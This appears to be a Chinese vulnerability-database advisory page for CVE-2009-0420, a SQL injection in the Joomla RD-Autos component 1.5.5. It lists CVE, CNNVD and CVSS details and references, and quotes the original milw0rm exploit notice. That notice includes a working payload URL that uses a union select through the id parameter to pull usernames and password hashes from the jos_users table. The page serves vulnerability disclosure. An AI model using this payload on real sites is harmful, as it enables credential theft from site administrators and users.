RD-Media RD-Autos SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117246 漏洞类型 SQL注入
发布时间 2009-01-15 更新时间 2009-02-05
CVE编号 CVE-2009-0420 CNNVD-ID CNNVD-200902-102
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7795
https://cxsecurity.com/issue/WLB-2009020123
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-102
|漏洞详情
Joomla!是一款开放源码的内容管理系统(CMS)。Joomla!RD-Autos(com_rdautos)组件1.5.5稳定版存在SQL注入漏洞。远程攻击者可以借助到index.php的id参数,执行任意的SQL指令。
|漏洞EXP
#############################################################################
#							                    #
#           Joomla Component RDAutos SQL Injection Vulnerability            #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de 
[~]         -=[Kosova Hackers Group]=--=[KHG-Crew]=-

########################################

[~] ScriptName:     "Joomla"
[~] Component:      "RDAutos (com_rdautos)"
[~] Version:        "1.5.5 Stable" 
[~] Date:           "29/09/2008"
[~] Author:         "Robert Dam"
[~] Author E-mail:  "info@rd-media.org"
[~] Author URL:     "www.rd-media.org"

########################################

[~] Exploit /index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
[~] Example /index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

# milw0rm.com [2009-01-15]
|参考资料

来源:BID
名称:33297
链接:http://www.securityfocus.com/bid/33297
来源:MILW0RM
名称:7795
链接:http://www.milw0rm.com/exploits/7795
来源:SECUNIA
名称:33562
链接:http://secunia.com/advisories/33562